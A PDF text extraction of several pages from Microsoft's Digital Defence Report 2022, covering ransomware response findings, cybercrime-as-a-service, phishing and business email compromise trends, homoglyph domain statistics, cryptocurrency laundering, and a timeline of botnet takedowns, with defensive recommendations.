Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 15. Ransomware insights from front-line responders Organisations worldwide experienced a steady growth in human-operated ransomware attacks beginning in 2019. However, law enforcement operations and geopolitical events in the last year had a significant impact on cybercriminal organisations. Microsoft’s Security Service Line supports customers through an entire cyberattack, from investigation to successful containment and recovery activities. The response and recovery services are offered via two highly integrated teams, with one focusing on the investigation and groundwork for recovery and the second one on containment and recovery. This section presents a summary of findings based on ransomware engagements over the past year. Ransomware incident and recovery engagements by industry Manufacturing 28% IT 4% Finance 8% Government 8% Health 20% Energy 8% Education 8% Consumer retail 16% As new small groups and threats emerge, defending teams must be aware of evolving ransomware threats while protecting against previously unknown ransomware malware families. The rapid development approach used by criminal groups led to the creation of intelligent ransomware packaged in easy-to-use kits. This allows greater flexibility in launching widespread attacks on a higher number of targets. The following pages provide a deeper look at the most commonly observed contributing factors to weak protection against ransomware, grouped into three categories of findings: 1. Weak identity controls 2. Ineffective security operations 3. Limited data protection 93% of Microsoft investigations during ransomware recovery engagements revealed insufficient privilege access and lateral movement controls. Summary of most common findings in ransomware response engagements Low maturity security operations Insufficient application security practices Limited adoption of modern security frameworks Insufficient privilege access and lateral movement controls Insecure configuration of identity provider No multifactor authentication Lack of information protection control 62% 74% 87% 93% 86% 74% 65% The most common finding among ransomware incident response engagements was insufficient privilege access and lateral movement controls. 14 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 16. Ransomware insights from front-line responders Continued Active Directory (AD) and Azure AD security 88% of impacted customers did not employ AD and Azure AD security best practices. This has become a common attack vector as attackers exploit misconfigurations and weaker security postures in critical identity systems to gain broader access and impact to businesses. Least privilege access and use of Privileged Access Workstations (PAW) None of the impacted organisations implemented proper administrative credential segregation and least privilege access principles via dedicated workstations during the management of their critical identity and high- value assets, such as proprietary systems and business-critical applications. Privilege account security 88% of engagements, MFA was not implemented for sensitive and high privileged accounts, leaving a security gap for attackers to compromise credentials and pivot further attacks using legitimate credentials. 84% Administrators across 84% of organisations did not use privilege identity controls such as just- in-time access to prevent further nefarious use of compromised privileged credentials. 1 Weak identity controls Human-operated ransomware continues to evolve and employ credential theft and lateral movement methods traditionally associated with targeted attacks. Successful attacks are often the result of long-running campaigns involving compromise of identity systems, like Active Directory (AD), that allow human operators to steal credentials, access systems and remain persistent in the network. 1 Weak identity controls: Credential theft attacks remain one of the top contributing factors 2 Ineffective security operations processes do not just present a window of opportunity for attackers, but significantly impact the time to recover 3 Eventually it boils down to data – organisations struggle to implement an effective data protection strategy which aligns with their business needs The three main contributing factors seen in our on-site response engagements: 15 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 17. Patching: 68% of impacted organisations did not have an effective vulnerability and patch management process, and a high dependence on manual processes versus automated patching led to critical openings. Manufacturing and critical infrastructure continue to struggle with maintenance and patching of legacy operational technology (OT) systems. Lack of security operations tooling: Most organisations reported a lack of end- to-end security visibility due to a lack or misconfiguration of security tools, leading to a decrease in detect and response effectiveness. 60% of organisations reported no use of an EDR6 tool, a fundamental technology for detection and response. 60% did not invest in security information and event management (SIEM) technology leading to monitoring silos, limited ability to detect end-to-end threats and inefficient security operations. Automation remains a key gap in SOC tooling and processes, forcing SOC staff to spend countless hours making sense of security telemetry. 84% of impacted organisations did not enable integration of their multi-cloud environments into their security operations tooling. Response and recovery processes: 76% Lack of an effective response plan was a critical area observed in 76% of impacted organisations, preventing proper organisational crisis readiness and negatively impacting time to respond and recover. Ransomware insights from front-line responders Continued 2 Ineffective security operations Our data shows organisations which suffered ransomware attacks have significant gaps in their security operations, tooling and information technology asset lifecycle management. Based on the available data, the following gaps were most observed: 3 Limited data protection Many compromised organisations lacked proper data protection processes leading to a severe impact on recovery times and the capability to return to business operations. The most common gaps encountered include: Immutable backup: 44% of organisations did not have immutable backups for the impacted systems. Data also shows administrators did not have backups and recovery plans for critical assets such as AD. Data loss prevention: Attackers usually find their way to compromise systems via exploiting vulnerabilities in the organisation, exfiltrating critical data for extortion, intellectual property theft or monetisation. 92% of impacted organisations did not implement effective data loss prevention controls to mitigate these risks, leading to critical data loss. 16 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 18. Ransomware declined in some regions and increased in others This year we observed a drop in the overall number of ransomware cases reported to our response teams in North America and Europe compared to the previous year. At the same time, cases reported in Latin America increased. One interpretation of this observation is cybercriminals pivoted away from areas perceived to have a higher risk of triggering law enforcement scrutiny in favour of softer targets. Since Microsoft did not observe a substantial improvement in enterprise network security worldwide to explain the decrease in ransomware-related support calls, we believe the most likely cause is a combination of law enforcement activity in 2021 and 2022 which increased the cost of criminal activity, along with some geopolitical events of 2022. One of the most prevalent RaaS operations belongs to a Russian-speaking criminal group known as REvil (also known as Sodinokibi) that has been active since 2019. In October 2021, REvil’s servers were taken offline as part of the international law enforcement Operation GoldDust.7 In January 2022, Russia arrested 14 alleged REvil members and raided 25 locations associated with them.8 This was the first time Russia acted against ransomware operators on its soil. Actionable insights 1 Focus on holistic security strategies, as all of the ransomware families take advantage of the same security weaknesses to impact a network. 2 Update and maintain security basics to increase defence-in-depth base level of protection and modernise security operations. Moving to the cloud allows you to detect threats more quickly and respond faster. Links to further information Protect your organisation from ransomware | Microsoft Security Seven ways to harden your environment against compromise | Microsoft Security Blog Improving AI-based defences to disrupt human-operated ransomware | Microsoft 365 Defender Research Team Security Insider: Explore the latest cybersecurity insights and updates | Microsoft Security While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. Moreover, tension between Russia and the United States over Russia’s invasion of Ukraine appears to have put an end to Russia’s nascent cooperation in the global fight against ransomware. After a brief period of uncertainty following the REvil arrests, the United States and Russia ceased cooperation in pursuing ransomware actors, which means cybercriminals might view Russia as a safe haven once more. Looking ahead, we predict the pace of ransomware activities will depend on the outcome of some key questions: 1. Will governments take action to prevent ransomware criminals from operating within their borders, or seek to disrupt actors operating from foreign soil? 2. Will ransomware groups change tactics to remove the need for ransomware and resort to extortion style attacks? 3. Will organisations be able to modernise and transform their IT operations faster than criminals can exploit vulnerabilities? 4. Will advancements in tracking and tracing ransom payments force ransom recipients to change tactics and negotiations? 2× Ransomware attacks decreased in some regions, but ransom demands more than doubled. While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. 17 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 19. the RDP, SSH and cPanels with appropriate tools and scripts to facilitate various types of cyberattacks. Homoglyph domain creation services are increasingly requiring payment in cryptocurrencies. Homoglyph domains impersonate legitimate domain names by utilising characters that are identical or nearly identical in appearance to another character. The aim is to deceive the viewer into thinking the homoglyph domain is the genuine domain. These domains are a ubiquitous threat and a gateway for a significant amount of cybercrime. CaaS sites now sell custom homoglyph domain names, which allows buyers to request specific company and domain names to impersonate. After payment is received, the CaaS merchants use a homoglyph generator tool to select the domain name and then register the malicious homoglyph. Payment for this service is almost exclusively in cryptocurrency. process invoicing, such as CFOs or ‘Accounts Receivable’. Similarly, industries participating in public contracting are often targeted due to the quantity of information that is made available through the public bidding process. DCU investigations into CaaS surfaced a number of key trends: The number and sophistication of services is increasing. One example is the evolution of web shells which typically consist of compromised web servers used to automate phishing attacks. DCU observed CaaS resellers simplifying the upload of phishing kits or malware through specialised web-dashboards. CaaS sellers often subsequently attempt to sell additional services to the threat actor through the dashboard such as spam message services and specialised spam recipient lists based on defined attributes including geographic location or profession. In some instances, we observed a single web shell being used in multiple attack campaigns, which suggests threat actors might maintain persistent access to the compromised server. We also observed an increase in anonymisation services available as part of the CaaS ecosystem as well as offers for virtual private networks (VPN) and virtual private server (VPS) accounts. In most instances, the VPN/VPS offered were initially procured through stolen credit cards. CaaS websites also offered a larger number of remote desktop protocol (RDP), secure shell (SSH) and cPanels for use as a platform to orchestrate cybercrime attacks. CaaS merchants configure Cybercriminals are now collaborating across time zones and languages to deliver specific results. For example, one CaaS website administered by an individual in Asia maintains operations in Europe, and creates malicious accounts in Africa. The multi-jurisdictional nature of these operations present complex law and enforcement challenges. In response, DCU focuses its efforts on disabling malicious criminal infrastructure used to facilitate CaaS attacks and collaborating with law enforcement agencies around the world to hold criminals accountable. Cybercriminals are increasingly using analytics to maximise reach, scope and gain. Like legitimate businesses, CaaS websites must ensure the validity of products and services to maintain a solid reputation. For example, CaaS websites routinely automate access to compromised accounts to ensure the validity of compromised credentials. Cybercriminals will discontinue sales of specific accounts when passwords are reset or vulnerabilities patched. Increasingly, we identified CaaS websites providing buyers with on-demand verification as a quality control process. As a result, buyers can feel confident the CaaS website sells active accounts and passwords while reducing potential costs to the CaaS merchant if the stolen credentials are remediated prior to sale. DCU also observed CaaS websites offering buyers the option to purchase compromised accounts from specific geographic locations, designated online service providers and specifically targeted individuals, professions and industries. Frequently ordered accounts focus on professionals or departments that Cybercrime- as-a-Service Cybercrime-as-a-Service (CaaS) is a growing and evolving threat to customers worldwide. The Microsoft Digital Crimes Unit (DCU) observed continued growth of the CaaS ecosystem with an increasing number of online services facilitating various cybercrimes, including BEC and human-operated ransomware. Phishing continues to be a preferred attack method as cybercriminals can acquire significant value from successfully stealing and selling access to stolen accounts. In response to the expanding CaaS market, DCU enhanced its listening systems to detect and identify CaaS offerings across the entire ecosystem of internet, deep web, vetted forums,9 dedicated websites, online discussion forums and messaging platforms. 2,750,000 site registrations successfully blocked by DCU this year to get ahead of criminal actors that planned to use them to engage in global cybercrime. 18 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 20. Attackers aim to encrypt as much data as possible 1 2 3 Select a phishing site template/design from among the hundreds offered. Once these steps are completed, the PhaaS merchant creates services with three or four layers of redirect and hosting resources to target specific users. The campaign is subsequently launched, and victim credentials are harvested, verified and sent to the email address provided by the purchaser. For a premium, many PhaaS merchants offer to host phishing sites on the public blockchain so they can be accessed by any browser and redirects can point users to a resource on the distributed ledger. Provide an email address to receive credentials obtained from phishing victims. Pay the PhaaS merchant in cryptocurrency. DCU’s work to develop tools and techniques which identify and disrupt CaaS cybercriminals is ongoing. The evolution of CaaS services presents significant challenges, particularly in disrupting cryptocurrency payments. 24/7 support. The DDoS subscription service offers different architectures and attack methods, so a purchaser simply selects a resource to attack and the seller provides access to an array of compromised devices on their botnet to conduct the attack. The cost for the DDoS subscription is a mere USD 500. it is a virtual machine, gathering details about the browser and hardware being used, and more. If all checks pass, traffic is sent to a landing page used for phishing. End-to-end cybercrime services are selling subscriptions to managed services. Typically, each step in the commission of an online crime can expose threat actors if operational security is poor. The risk of exposure and identification increases if services are purchased from multiple CaaS sites. DCU observed a concerning trend in the dark web whereby there is an increase in services offering to anonymise software code and genericise website text to reduce exposure. End- to-end cybercrime subscription service providers manage all services and guarantee results which further reduce exposure risks to the subscribing OCN. The reduced risk has increased the popularity of these end-to-end services. Phishing-as-a-Service (PhaaS) is one example of an end-to-end cybercrime service. PhaaS is an evolution of prior services known as fully undetectable services (FUD) and is offered on a subscription basis. Typical PhaaS terms include keeping phishing websites active for a month. DCU also identified a CaaS merchant offering distributed denial of service (DDoS) on a subscription model. This model outsources the creation and maintenance of the botnet necessary to carry out attacks to the CaaS merchant. Each DDoS subscription customer receives an encrypted service to enhance operational security and one year of CaaS sellers increasingly offer compromised credentials for purchase. Compromised credentials enable unauthorised access to user accounts including email messaging service, corporate file sharing resources and OneDrive for Business. If administrator credentials are compromised, unauthorised users could gain access to confidential files, Azure resources and company user accounts. In many instances, DCU investigations identified unauthorised use of the same credential across multiple servers as a means to automate verifying credentials. This pattern suggests the compromised user might be a victim of multiple phishing attacks or have device malware allowing botnet keyloggers to collect credentials. CaaS services and products with enhanced features are emerging to avoid detection. One CaaS seller offers phishing kits with increased layers of complexity and anonymisation features designed to circumvent detection and prevention systems for as little as USD 6 per day. The service offers a series of redirects that perform checks before allowing traffic to the next layer or site. One of these runs over 90 checks for fingerprinting the device, including whether Cybercrime- as-a-Service Continued PhaaS, cybercriminals offer multiple services within a single subscription. In general, a purchaser needs to take only three actions: 19 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 21. and force cybercriminals to use other obfuscation methods like coin tumbling or unlicensed exchanges. As an example, Uniswap recently announced it will start to use blacklists to block wallets known to be involved in illicit activities from transacting on the exchange.15 cash-out options, such as centralised exchanges (CEX), peer-to-peer (P2P) and over the counter (OTC) exchanges. DEXes are an attractive laundering location because they often do not follow AML measures. In December 2021, hackers attacked the global cryptocurrency trading platform AscendEx and stole approximately USD 77.7 million in cryptocurrency belonging to its customers.12 AscendEx hired blockchain analytics firms and contacted other CEXs so the wallets receiving stolen funds could be blacklisted. Additionally, addresses where the coins were sent were labelled as such on the Ethereum blockchain explorer Etherscan.13 In order to circumvent the alerting and blacklisting, the hackers sent USD 1.5 million in Ethereum to Uniswap, one of the world’s largest DEXs, on February 18, 2022.14 The adoption of stronger AML measures by DEXs could blunt laundering activity on their platforms Tracking ransomware payments Ransomware is one of the largest sources of illicitly gained cryptocurrency. In an effort to disrupt malicious technical infrastructure used in ransomware attacks – for example, the disruption of Zloader in April 202211 – Microsoft’s DCU tracks criminal wallets to enable cryptocurrency tracking and recovery capabilities. DCU investigators have observed ransomware actors evolving their communication tactics with victims to conceal the money trail. Originally, cybercriminals included Bitcoin addresses in their ransom notes. However, this made it easy to follow payment transactions on the blockchain, so ransomware actors stopped including wallet addresses and instead appended email addresses or links to chat websites to communicate ransom payment addresses to victims. Some actors even created unique webpages and logins for each victim to prevent security researchers and law enforcement from obtaining the criminals’ wallet addresses by pretending to be victims. Despite criminals’ efforts to hide their tracks, some ransom payments can still be recovered by working with law enforcement and crypto analysis companies that can track movement on the blockchain. Trending: DEX laundering of illicit proceeds A key issue for cybercriminals is the conversion of cryptocurrency to fiat currency. Cybercriminals have several potential avenues for conversion, each of which carries a different degree of risk. One method used to reduce risk is to launder proceeds through a decentralised exchange (DEX) before cashing out via available Criminal use of cryptocurrencies As the adoption of cryptocurrency becomes mainstream, criminals are increasingly using it to evade law enforcement and anti-money laundering (AML) measures. This heightens the challenge for law enforcement to track and trace cryptocurrency payments to cybercriminals. Worldwide spending on blockchain solutions grew by approximately 340% over the last four years, while new cryptocurrency wallets grew by around 270%. There are more than 83 million unique wallets globally, and the total market capitalisation of all cryptocurrencies was approximately USD 1.1 trillion as of July 28, 2022.10 Source: Twitter.com – @PeckShieldAlert (PeckShield is a China-based blockchain security company). Using the cryptocurrency investigative tool Chainalysis, Microsoft’s Digital Crimes Unit discovered the AcendEX hackers swapped their stolen funds at a smaller DEX called Curve in addition to Uniswap. This diagram illustrates the laundering routes the team uncovered. Each circle represents a cluster of wallets and the numbers on each line represent the total amount of Ethereum transmitted for laundering purposes. Actionable insights 1 If you are a victim of cybercrime who has paid the criminal using cryptocurrency, contact local law enforcement who might be able to help track and recover lost funds. 2 Become familiar with the ALM measures in place when selecting a DEX. Links to further information Hardware-based threat defence against increasingly complex cryptojackers | Microsoft 365 Defender Research Team Uniswap V3 Curve AscendEX.com AscendEX.com stolen funds 11-12-2021 72.19 ETH ETH 46.77 Tracking illicitly gained cryptocurrency 20 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 22. Microsoft detects millions of BEC emails every month, equivalent to 0.6% of all phishing emails observed. A report from IC318 published in May 2022 indicates an upward trend in exposed losses due to BEC attacks. The techniques used in phishing attacks continue to increase in complexity. In response to countermeasures, attackers adapt new ways to implement their techniques and increase the complexity of how and where they host campaign operation infrastructure. This means organisations must regularly reassess their strategy for implementing security solutions to block malicious emails and strengthen access control for individual user accounts. The evolving phishing threat landscape Credential phishing schemes are on the rise and remain a substantial threat to users everywhere because they indiscriminately target all inboxes. Among the threats our researchers track and protect against, the volume of phishing attacks is orders of magnitude greater than all other threats. Using data from Defender for Office, we see malicious email and compromised identity activity. Azure Active Directory Identity Protection provides still more information through compromised identity event alerts. Using Defender for Cloud Apps, we see compromised identity data access events, and Microsoft 365 Defender (M365D) provides cross-product correlation. The lateral movement metric comes from Defender for Endpoint (attack behaviour alerts and events), Defender for Office (malicious email) and again M365D for cross- product correlation). 531,000 In addition to the URLs blocked by Defender for Office, our Digital Crimes Unit directed the takedown of 531,000 unique phishing URLs hosted outside of Microsoft. 1 hr 12 m The median time it takes for an attacker to access your private data if you fall victim to a phishing email.16 1 hr 42 m The median time for an attacker to begin moving laterally within your corporate network once a device is compromised.17 Detected phish emails Millions 900 800 700 600 500 400 300 200 100 0 Jul 2021 Aug 2021 Sep 2021 Oct 2021 Nov 2021 Dec 2021 Jan 2022 Feb 2022 Mar 2022 Apr 2022 May 2022 Jun 2022 The number of phish detections per week continue to rise. The decrease in December-January is an expected seasonal drop, also reported in last year’s report. Source: Exchange Online Protection signals. 710 million phishing emails blocked per week. Microsoft 365 credentials remain one of the most highly sought-after account types for attackers. Once login credentials are compromised, attackers can log in to corporate-tied computer systems to facilitate infection with malware and ransomware, steal confidential company data and information by accessing SharePoint files, and continue the spread of phish by sending additional malicious emails using Outlook, among other actions. In addition to campaigns with broader targets, phishing for credentials, donations and personal information, attackers are targeting selective businesses for larger payouts. Email phishing attacks against businesses for financial gain are collectively referred to as BEC attacks. 21 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 23. More than ever, phishers are relying on legitimate infrastructure to operate, driving a rise in phishing campaigns aimed at compromising various aspects of an operation so they do not have to purchase, host or operate their own. For example, malicious emails might originate from compromised sender accounts. Attackers benefit from using these email addresses which have a higher reputation score and are seen as more trustworthy than newly created accounts and domains. In some more advanced phishing campaigns, we observed attackers preferring to send and spoof from domains which have DMARC19 incorrectly set up with a ‘no action’ policy, opening the door for email spoofing. We continue to observe a steady year-over-year increase in phishing emails. The shift to remote work in 2020 and 2021 saw a substantial increase in phishing attacks aiming to capitalise on the changing work environment. Phish operators are quick to adopt new email templates using lures aligned with major world events such as the COVID-19 pandemic and themes linked to collaboration and productivity tools such as Google Drive or OneDrive file sharing. While COVID-19 themes have diminished, the war in Ukraine became a new lure starting in early March 2022. Our researchers observed a staggering increase of emails impersonating legitimate organisations soliciting cryptocurrency donations in Bitcoin and Ethereum, allegedly to support Ukrainian citizens. Only a few days after the start of the war in Ukraine in late February 2022, the number of detected phishing emails containing Ethereum addresses encountered across enterprise customers increased dramatically. Total encounters peaked in the first week of March when half a million phishing emails contained an Ethereum wallet address. Prior to the start of the war, the number of Ethereum wallet addresses across other emails detected as phish was significantly less, averaging a few thousand emails per day. Large phish operations tend to use cloud services and cloud virtual machines (VMs) to operationalise large scale attacks. Attackers can fully automate the process of deploying and delivering emails from VMs using SMTP email relays or cloud email infrastructure to benefit from the high deliverability rates and positive reputation of these legitimate services. If malicious email is allowed to be sent through these cloud services, defenders must rely on strong email filtering capabilities to block emails from entering their environment. Microsoft accounts remain a top target for phishing operators, as evidenced by the numerous phishing landing pages which impersonate the Microsoft 365 login page. For example, phishers attempt to match the Microsoft login experience in their phish kits by generating a unique URL customised to the recipient. This URL points to a malicious webpage developed to harvest credentials, but a parameter in the URL will contain the specific recipient’s email address. Once the target navigates to the page, the phish kit will pre- populate user login data and a corporate logo customised to the email recipient, mirroring the appearance of the targeted company’s custom Microsoft 365 login page. Phishing page impersonating a Microsoft login with dynamic content Phishing emails with Ethereum wallet addresses Thousands 0 100 200 300 400 500 600 Jul 2021 Aug 2021 Sep 2021 Oct 2021 Nov 2021 Dec 2021 Jan 2022 Feb 2022 Mar 2022 Apr 2022 May 2022 Jun 2022 Total emails detected as phish containing Ethereum wallet addresses increased at the start of the Ukraine-Russia conflict and tapered off after the initial push. The evolving phishing threat landscape Continued 22 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 24. Defending against phish To reduce your organisation’s exposure to phish, IT administrators are encouraged to implement the following policies and features: 1 Require the use of MFA across all accounts to limit unauthorised access. 2 Enable conditional access features for highly privileged accounts to block access from countries, regions and IPs that do not typically generate traffic at your organisation. 3 Consider using physical security keys for executives, employees involved in payment or purchase activities and other privileged accounts. 4 Enforce the use of browsers which support services such as Microsoft SmartScreen to analyse URLs for suspicious behaviours and blocks access to known malicious websites.23 5 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox, such as Microsoft Defender for Office 365.24 6 Enable impersonation and spoofing protection features across your organisation. 7 Configure DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication Reporting Conformance (DMARC) action policies to prevent delivery of non-authenticated emails that might be spoofing reputable senders. 8 Audit tenant and user created allow rules and remove broad domain and IP based exceptions. These rules often take precedence and can allow known malicious emails through email filtering. 9 Regularly run phishing simulators to gauge the potential risk across your organisation and to identify and educate vulnerable users. Links to further information From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud | Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Centre (MSTIC) BEC trends As a point of entry, BEC attackers normally attempt to start a conversation with potential victims to establish rapport. Posing as a colleague or business acquaintance, the attacker gradually leads the conversation in the direction of a monetary transfer. The introduction email, which we track as a BEC lure, represents close to 80% of detected BEC emails. Other trends identified by Microsoft security researchers over the past year include: • The most frequently used techniques in BEC attacks observed in 2022 were spoofing21 and impersonation.22 • The BEC subtype causing the most financial damage to victims was invoice fraud (based on volume and requested dollar amounts seen in our BEC campaign investigations). • Business information theft such as accounts payable reports and customer contacts enable attackers to craft convincing invoice fraud. • Most payroll redirection requests were sent from free email services and seldom from compromised accounts. Email volume from these sources spiked around the first and fifteenth of each month, the most common pay dates. • Despite being well-known avenues for fraud, gift card scams comprised only 1.9% of the BEC attacks detected. Spotlight on business email compromise Cybercriminals are developing increasingly complex schemes and techniques to defeat security settings and target individuals, businesses and organisations. We are investing significant resources to further enhance our BEC enforcement programme in response. BEC is the costliest financial cybercrime, with an estimated USD 2.4 billion in adjusted losses in 2021, representing more than 59% of the top five internet crime losses globally.20 To understand the scope of the problem and how best to protect users against BEC, Microsoft security researchers have been tracking the most common themes used in attacks. BEC themes (January-June 2022) Invoice fraud 9.3% BEC lure 79.9% Payroll redirection 4.6% Business information 4.3% Gift card scam 1.9% BEC themes by percentage of occurrence Actionable insights 23 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 25. Homoglyph deception BEC and phishing are common social engineering tactics. Social engineering plays a significant role in crime, persuading a target to interact with the criminal by gaining trust. In physical commerce, trademarks are used to secure trust in the origin of a product or service, and counterfeit products are an abuse of the trademark. Similarly, cybercriminals pose as a contact familiar to the target during a phishing attack, using homoglyphs to deceive potential victims. A homoglyph is a domain name used for email communication in BEC, in which a character is replaced by one that is identical or nearly identical in appearance, in order to deceive the target. Homoglyph techniques used in BEC attempts BEC generally has two phases, the first of which involves compromise of credentials. These types of credential leaks can be a result of phishing attacks or large data breaches. The credentials are then sold or traded on the dark web. The second phase is the fraud phase, where attackers use compromised credentials to engage in sophisticated social engineering using homoglyph email domains. Actionable insights 1 Enforce the use of browsers that support services to analyse URLs for suspicious behaviours and blocks access to known malicious websites such as Safe Links and SmartScreen.25 2 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox. Links to further information Internet Crime Complaint Centre (IC3) | Business Email Compromise: The USD 43 Billion Scam Spoof intelligence insight – Office 365 | Microsoft Docs Impersonation insight – Office 365 | Microsoft Docs Technique % of domains showing homoglyph technique sub l for I 25% sub i for l 12% sub q for g 7% sub rn for m 6% sub .cam for .com 6% sub 0 for o 5% sub ll for l 3% sub ii for i 2% sub vv for w 2% sub l for ll 2% sub e for a 2% sub nn for m 1% sub ll for I, sub l for i 1% sub o for u 1% Analysis of over 1,700 homoglyph domains between January-July 2022. While 170 homoglyph techniques were used, 75% of domains used just 14 techniques. A homoglyph in action A homoglyph domain that looks identical to a mail domain the victim recognises is registered on a mail provider with a username that is identical. A hijacked email is then sent from the hijacked domain with new payment instructions. Leveraging open-source intelligence and access to email threads, the criminal identifies individuals who have responsibility for invoicing and payments. They then create an impersonation of an email address of the individual sending invoices. This impersonation is composed of an identical username and mail domain that is a homoglyph of the genuine sender. The attacker copies an email chain containing a legitimate invoice, then changes the invoice to contain their own bank details. This new, modified invoice is then resent from the homoglyph impersonation email to the target. Because the context makes sense and the email looks genuine, often the target follows the fraudulent instructions. Progression of a BEC attack 24 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 26. Waledac botnet Description: A complex spam botnet with US domains that collected email addresses and distributed spam that infected up to 90,000 computers across the world.26 Collaboration: Creation of another consortium, the Microsoft Malware Protection Centre (MMPC) with a focus on close collaboration with academics.27 Microsoft response: Microsoft used tiered disruption approach of C2 and surprised bad actors by seizing US-based domains without notice.28 Microsoft granted temporary ownership of nearly 280 domains used by Waledac’s servers. Trickbot botnet Description: A sophisticated botnet with fragmented infrastructure across the globe that targeted the financial services industry; compromised IoT devices. Collaboration: Microsoft partnered with the Financial Services Information Sharing and Analysis Centre (FS-ISAC) to bring down Trickbot.30 Microsoft response: DCU built a system to identify and track bot infrastructure and generated notifications for active internet providers, taking into account specific laws in various countries. 2008 2009 2011 2013 2019 2022 Description: A fast-spreading worm targeting the Windows OS, infecting millions of computers and devices in a common network; created network outages worldwide. Collaboration: Formation of the Conficker Working Group, the first consortium of its kind. Microsoft partnered with 16 organisations across the globe to defeat the bot. Microsoft response: The group collaborated across many international jurisdictions and was successful bringing Conficker down. Conficker botnet Collaboration: Designed to thwart cybercrime impacting the Microsoft ecosystem through close integration across a team of investigators, lawyers and engineers. Microsoft approach: The goal is to better understand the technical aspects of various malware and provide these insights to Microsoft’s legal team to develop an effective disruption strategy. Microsoft Digital Crimes Unit is formed DCU continues to innovate and is looking to use its experience in botnet disruptions to conduct coordinated operations that go beyond malware. Our continued success requires creative engineering, sharing of information, innovative legal theories and public and private partnerships. Looking ahead Description: Microsoft disrupted the infrastructure of seven threat actors over the past year, preventing them from distributing additional malware, controlling victims’ computers and targeting additional victims. Collaboration: In partnership with internet service providers, governments, law enforcement and private industry, Microsoft shared information to remediate over 17 million malware victims worldwide. Continued focus on disruption Description: An advertising botnet designed to direct people to dangerous websites that would install malware or steal personal information; infected more than two million computers and cost advertisers more than USD 2.7 million per month; primarily in US and Western Europe. Collaboration: Worked closely with the FBI and Europol’s Cybercrime Centre to bring down the peer-to- peer infrastructure. Microsoft response: Joined the Zero Access network, replaced the criminal C2 servers and successfully seized download server domains. Sirefef/Zero Access botnet Rustock botnet Description: A backdoor trojan spam email bot using internet providers as primary C2s; designed to sell pharmaceuticals. Collaboration: Microsoft forged a partnership with Pfizer Pharmaceuticals to understand the drugs sold by Rustock and worked closely with Dutch law enforcement officials.29 Microsoft response: Microsoft worked with US Marshals and law enforcement in the Netherlands to take down the C2 servers in that country. Registered and blocked all future domain generator algorithms (DGAs). A timeline of botnet disruption from Microsoft’s early days of collaboration For more than a decade, DCU has worked to proactively stop cybercrime resulting in 26 malware and nation state disruptions. As the DCU team uses more advanced tactics and tools to shut down these illicit operations, we see the cybercriminals also evolve their approaches in an attempt to stay a step head. Here is a timeline showing a sample of the botnets disrupted by DCU and the strategies Microsoft adopted to shut them down. 25 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
